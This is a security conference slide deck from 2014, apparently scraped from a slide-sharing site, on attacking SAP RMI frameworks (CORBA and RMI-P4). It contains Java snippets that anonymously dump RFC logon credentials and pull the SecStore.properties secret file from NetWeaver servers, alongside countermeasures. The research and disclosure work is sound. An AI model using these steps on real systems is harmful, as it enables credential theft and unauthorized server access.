Dissecting and Attacking RMI Frameworks

CONFIDENTIAL© 2014 Onapsis, Inc. All Rights Reserved
03/12/2014
1
Title goes hereNahuel D. Sánchez Sergio Abraham
nsanchez@onapsis.com abraham@onapsis.com
@serj_ab
Dissecting and Attacking RMI Frameworks

This presentation contains references to the products of SAP AG. SAP, R/3, xApps, xApp, SAP NetWeaver,
Duet, PartnerEdge, ByDesign, SAP Business ByDesign, and other SAP products and services mentioned
herein are trademarks or registered trademarks of SAP AG in Germany and in several other countries all
over the world.
Business Objects and the Business Objects logo, BusinessObjects, Crystal Reports, Crystal Decisions, Web
Intelligence, Xcelsius and other Business Objects products and services mentioned herein are trademarks
or registered trademarks of Business Objects in the United States and/or other countries.
SAP AG is neither the author nor the publisher of this publication and is not responsible for its content,
and SAP Group shall not be liable for errors or omissions with respect to the materials.
Disclaimer

Onapsis Inc. Overview
Transforming how organizations protect the applications that
manage their business-critical processes and information.
 Founded: 2009
 Locations: Buenos Aires, AR | Boston, MA | Berlin, DE | Lyon, FR
 Technology: Onapsis X1 (Auditor Solution)
Onapsis Security Platform (Enterprise Solution)
(PCT patent-pending)
 Pricing: Subscription-based (Enterprise, Audit On-Demand and MSP)
 Research: 130+ SAP security advisories and presentations published

Who are We?
 Sergio: SAP Security Specialist
 Nahuel: Security Researcher
• Reported more than 25 vulnerabilities in different SAP Products
• Onapsis Blog contributors
• Authors of Onapsis SAP Security In-Depth Publications
• Speakers/Trainers at Ekoparty, Hubcon, SANS

 Introduction
• What is RMI?
• RMI Implementations
• RMI vs Web Services
 CORBA implementation
• Basic concepts (IDL’s, IOR’s)
• CORBA and SAP Business Objects
• Attacks
 P4 implementation
• Basic Concepts
• P4 and SAP NetWeaver
 Conclusions
Agenda

 RMI stands for Remote Method Invocation
 Conceptually similar to RPC (Remote Procedure Call)
 Allows the invocation of clients running on remote machines
Introduction | What is RMI?

Introduction | What is RMI? Cont’d

 Same Idea, different implementation
 Both allow users to execute actions in the server
 RMI
• 15-20 years old
• Complex (objects management, garbage collection)
• Provide interfaces for legacy systems
• Stateful
• A more profitable attack target
 Web Services
• 15-20 years old
• Stateless
• Aware of RMI limitations/problems when developed
RMI vs Web Services

 Products using RMI-based protocols
• Jboss Application Server (Java-RMI)
• Oracle Weblogic Server (Weblogic-RMI)
• IBM Lotus Domino (Java-RMI)
• Apache Axis2 (CORBA)
 In this talk
• SAP Business Objects (CORBA)
• SAP Netweaver Java (RMI-P4)
Introduction | What is RMI? Cont’d

So…What is SAP?
SAP (Systems, Applications and Products in Data Processing) is a German
company devoted to the development of business solutions.
 Founded in 1972.
 Almost 67,000 employees.*
 More than 253,000 customers.*
 Presence in most countries
Third biggest independent software vendor (ISV).
• http://www.sap.com/corporate-en/about/our-company/index.html
• http://en.wikipedia.org/wiki/SAP_SE

SAP Solutions
 Enterprise Solutions
 SAP CRM (Customer Relationship Management).
 SAP ERP (Enterprise Resource Planning).
 SAP SCM (Supply Chain Management).
 SAP SRM (Supplier Relationship Management).
 Business Solutions
 SAP GRC (Government, Risk and Compliance).
 SAP Portal
 SAP Solution Manager
 SAP Business Objects

CORBA implementation
 Common Object Request Broker Architecture
 Connect different software components (local/remote)
 Language agnostic
 Object oriented
 Provides “Objectization” to non-object languages like C or COBOL
http://pubs.opengroup.org-onlinepubs-9279299-apdxa.htm

Common Object Request Broker Architecture
http://www.cs.wustl.edu/schmidt-corba-overview.html

CORBA – Locating objects
 CORBA Naming Service
• Implemented as an “Object Service”
• Provides a way to locate other objects
 CorbaLoc & CorbaName URLs
• Similar to “common” URLs
corbaloc:: target:1234/MyObjectKey
corbaname::target:1234/NameService#Hello/World

CORBA – Locating objects
IOR:010000003500000049444c3a696d672e73656167617465736f6674776172652e636f6d2f
_IIOP_ParseCDR: byte order LittleEndian, repository id
<IDL:img.seagatesoftware.com/ImplServ/OSCAFactory:3.1>, 1 profile
_IIOP_ParseCDR: profile 1 is 70 bytes, tag 0 (INTERNET), LittleEndian byte order
(iiop.c:parse_IIOP_Profile): bo=LittleEndian, version=1.1, hostname=BO4WV,
port=1056, object_key=<....`hjR........>
object key is <#00#00#00#00`hjR#88#C5#0C#00#02#00#00#00>;
no trustworthy most-specific-type info; unrecognized ORB type;
reachable with IIOP 1.1 at host "BO4WV", port 1056
 Interoperable Object References (IOR)
• Object key
• IP Address
• Listening port
• Repository ID
 Parsed IOR:

CORBA – IDLs
 Interface Definition Language (IDLs)
• Define objects
• Shared by the client and the server
• Language specific compilation
 Example IDL interface
//fortune.idl
Module Fortune {
interface CookieServer {
string get_cookie();
};
};

CORBA & SAP Business Objects
 Used to inter-process communications only
 SAP doesn’t provide IDLs for objects
 Options we have:
• Reverse engineering IDLs from classes (PITA)
Import JAVA Jar files and use it directly
 Files required:
• corbaidl.jar
• ebus405.jar

CORBA & SAP Business Objects
 The BOE Central Management Server (CMS)
• Platform’s brain
• Keeps track of all enabled services/servers
 Name server port
• Port TCP 6400 (default)
• Applications use this port for first contact
 Request port
• Dynamic port by default
• Used by all applications after first request

What we need to attack in a BO implementation?
 CMS IP
 CMS Static Port
 CMS IOR
 SRV’s IORs

Obtaining the CMS IOR
 Obtained through traffic analysis
 Client sends string “aps” to CMS static port (6400)
 CMS returns its IOR
 Needed to further attacks

DEMO #1

DEMO #2

RMI-P4
 SAP proprietary protocol
 Present in every SAP Netweaver Application Server Java
 Combines features of Java RMI and CORBA
 Listens on port: 5XX04, (5XX06 for SSL)
 Can be tunneled through HTTP!!! P4HTTP (5XX05)
Enables client-server communication:
• Locating remote objects
• Communication with remote objects
• Loading classes remotely
 Examples:
• SAP Enterprise Portal
• SAP Solution Manager
https://help.sap.com/saphelp_nwce711/helpdata/en/48/295738a14558d8e10000000a421937/content.htm

RMI-P4
 Where is specifically RMI-P4 used?
• Real example: JMX (Java Management Extensions)
o Allows building manageable distributed Java Apps
 start/stop/restart
 changing configuration
 backup/import settings/so on…
 client-server architecture based on: RMI-P4
In fact... SAP Netweaver Application Server Java is based on a JMX Architecture
http://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=73160

RMI-P4
 Basic implementation
• Server-side:
public interface HelloWorld extends java.rmi.Remote {
public void hello();
}
public class HelloWorldImpl implements HelloWorld {
public void Hello() {
System.out.println(“Hello World”);
}
}
• Server and Client-side:
RMI-P4 does not use IDLs (as CORBA).
Interfaces are already known by the client since they are defined in both sides.

RMI-P4
 How to find and invoke a remote object?
JNDI (Java Native Directory Interface)
 Standard Java API
 Allows applications to access multiple naming and directory services via a common
interface
 Two very interesting features:
 Naming Service
 Directory Service
https://help.sap.com/saphelp_nwce711/helpdata/en/99/e8b84172133131e10000000a155106/content.htm

Let’s mix the ingredients

public class BankClient {
Properties p = new Properties();
// Specify the type of the InitialContext factory.
p.put(Context.INITIAL_CONTEXT_FACTORY,
"com.sap.engine.services.jndi.InitialContextFactoryImpl");
p.put(Context.PROVIDER_URL, “p4://” args[0] + ":" + args[1]); //Specify the
URL.
p.put(Context.SECURITY_PRINCIPAL, args[2]); //Specify the user.
p.put(Context.SECURITY_CREDENTIALS, args[3]);//Specify the password.
Context initialContext = new InitialContext(p); // Connect to the server by
the InitialContext.
Account account = (Account) initialContext.lookup("Bank");
// Invoke methods remotely.
account.deposit(100);
System.out.println("Balance:" + account.getBalance());
System.out.println("Try to draw...");
account.draw(50);
System.out.println("Balance:" + account.getBalance());
} catch (Exception ex) {
ex.printStackTrace();
}}
}
RMI-P4

RMI-P4
What happens if we do not specify this?
The user is logged as GUEST and.. as every application defines its own security
requirements… It only takes one missing authorization check in order to get full access!
https://help.sap.com/saphelp_nw73ehp1/helpdata/en/e9/88435b5d84b24e8c62048ff36bd600/content.htm
http://help.sap-ag.de/saphelp_nw73/helpdata/de/4a/eac9a0cd2823aee10000000a42189c/frameset.htm
p.put(Context.SECURITY_PRINCIPAL, args[2]); //Specify the user.
p.put(Context.SECURITY_CREDENTIALS, args[3]);//Specify the password.

RMI-P4
Attack 1: Authentication Credentials Disclosure
Example of application of this attack: System Landscape Directory
• Central information repository
• Consolidates all systems, hardware and software components
• Allows administration of systems
o Installation
o Updates and patches
o Interfaces
• Mandatory in every SAP implementation
http://help.sap.com/saphelp_nw70/helpdata/en/21/84570b3ae14e77b3047c82218974b9/content.htm

DEMO
Authentication Credentials disclosure

p.put(Context.PROVIDER_URL, "p4://" + host + ":" + port);
Context initialContext = new InitialContext(p);
RFCRuntimeInterface_Stub o =
(RFCRuntimeInterface_Stub)initialContext.lookup("rfcengine");
BundleConfiguration[] bc = o.getConfigurations();
for (int i = 0; i < bc.length; i++) {
String data =
bc[i].getLogonClient()+":”+bc[i].getLogonUser()+":"+bc[i].getLogonPassword();
System.out.println(data);
Attack 1: Authentication Credentials Disclosure
RMI-P4

RMI-P4
Attack 2: Anonymous Remote File Read/Write
Targeted service: File Transfer Service API
• SAP Ready-to-Use Service
• Allows upload/download of files to/from the AppServer
• Most common use case: deploy of java applications
• Main problem: Lack of authorization checks.
o Consequence: Accessible by GUEST user!
http://help.sap.com/saphelp_oil472/helpdata/en/48/1d813ecfd43546e10000000a114084/content.htm
One more step…
Get Secure Store:
• Secure Store container (SecStore.properties)
• Secure Store key (SecStore.key)
• Decrypt! (3DES)

DEMO
Anonymous remote file read/write

FileTransfer_Stub o = (FileTransfer_Stub) initialContext.lookup("file");
String source = “C:tmpSecStore.properties”
String dest = “/usr/sap/<SID>/SYS/global/security/data/SecStore.properties”
com.sap.engine.services.file.RemoteFile f = o.createRemoteFile(source, dest);
f.download();
RMI-P4

FileTransfer_Stub o = (FileTransfer_Stub) initialContext.lookup("file");
String source = “C:tmpSecStore.properties”
String dest = “/usr/sap/<SID>/SYS/global/security/data/SecStore.properties”
com.sap.engine.services.file.RemoteFile f = o.createRemoteFile(source, dest);
f.download();
RMI-P4
Protection / Countermeasure
 Secure P4 service (5XX04, 5XX05, 5XX06)
 Apply all SAP Security Notes. Keep the systems up-to-date.
 Implement SAP Security Notes 1682613 and 1819822.
Check the “References” slide for more information!

 Bullet 1
• Bullet 2
o Bullet 3
Conclusions

Dissecting and Attacking RMI Frameworks

Recommended

Recommended

More Related Content

What's hot

What's hot (20)

Similar to Dissecting and Attacking RMI Frameworks

Similar to Dissecting and Attacking RMI Frameworks (20)

More from Onapsis Inc.

More from Onapsis Inc. (6)

Recently uploaded

Recently uploaded (20)

Dissecting and Attacking RMI Frameworks